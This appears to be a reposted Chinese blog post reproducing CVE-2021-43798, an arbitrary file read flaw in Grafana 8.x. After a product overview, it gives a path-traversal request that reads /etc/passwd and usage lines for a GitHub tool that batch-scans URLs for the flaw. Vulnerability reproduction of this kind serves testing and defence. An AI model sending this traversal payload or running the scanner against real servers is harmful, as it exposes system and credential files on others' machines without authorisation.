Grafana介绍:

未修复(CVE-2021-43798)Grafana 任意文件读取漏洞复现

Grafana 允许您查询、可视化、提醒和了解您的指标,无论它们存储在哪里。与您的团队创建、探索和共享仪表板,并培养数据驱动的文化:

  • 可视化:具有多种选项的快速灵活的客户端图形。面板插件提供了许多不同的方式来可视化指标和日志。
  • 动态仪表板:使用显示为仪表板顶部下拉菜单的模板变量创建动态和可重用的仪表板。
  • 探索指标:通过即席查询和动态钻取探索您的数据。拆分视图并并排比较不同的时间范围、查询和数据源。
  • 探索日志:体验从指标切换到带有保留标签过滤器的日志的魔力。快速搜索所有日志或实时流式传输它们。
  • 警报:直观地为您最重要的指标定义警报规则。Grafana 将持续评估并向 Slack、PagerDuty、VictorOps、OpsGenie 等系统发送通知。
  • 混合数据源:在同一张图中混合不同的数据源!您可以在每个查询的基础上指定数据源。这甚至适用于自定义数据源。

未修复(CVE-2021-43798)Grafana 任意文件读取漏洞复现

下载:

官网下载地址:Grafana

安装指南:Grafana

根据自己的系统版本和配置,下载对应的包,官方提供了如下说明,可直接按照说明进行下载:

未修复(CVE-2021-43798)Grafana 任意文件读取漏洞复现

漏洞状态:

该漏洞暂无补丁,伪0day状态

受影响版本:

Grafana 8.x 系列

验证poc:

构造get请求/public/plugins/welcome/../../../../../../../../../etc/passwd

单体检测或批量检测:

https://github.com/Ilovewomen/Grafana_CVE/releases

python Grafana.py -r 12.txt

执行结束后会返回存在问题的url,输出至当前目录下的Grafana.txt文件内,不需要手动建立,会自动添加

—————————————————————-+
+ [grafana任意文件读取检测工具]                                     +
+ [使用方式: python grafana.py -u/–url http://xxx.xxx.xxx.xxx]    +
+ [使用方式: python grafana.py -r/–read result.txt]              +
+—————————————————————+

本文来源于互联网:未修复(CVE-2021-43798)Grafana 任意文件读取漏洞复现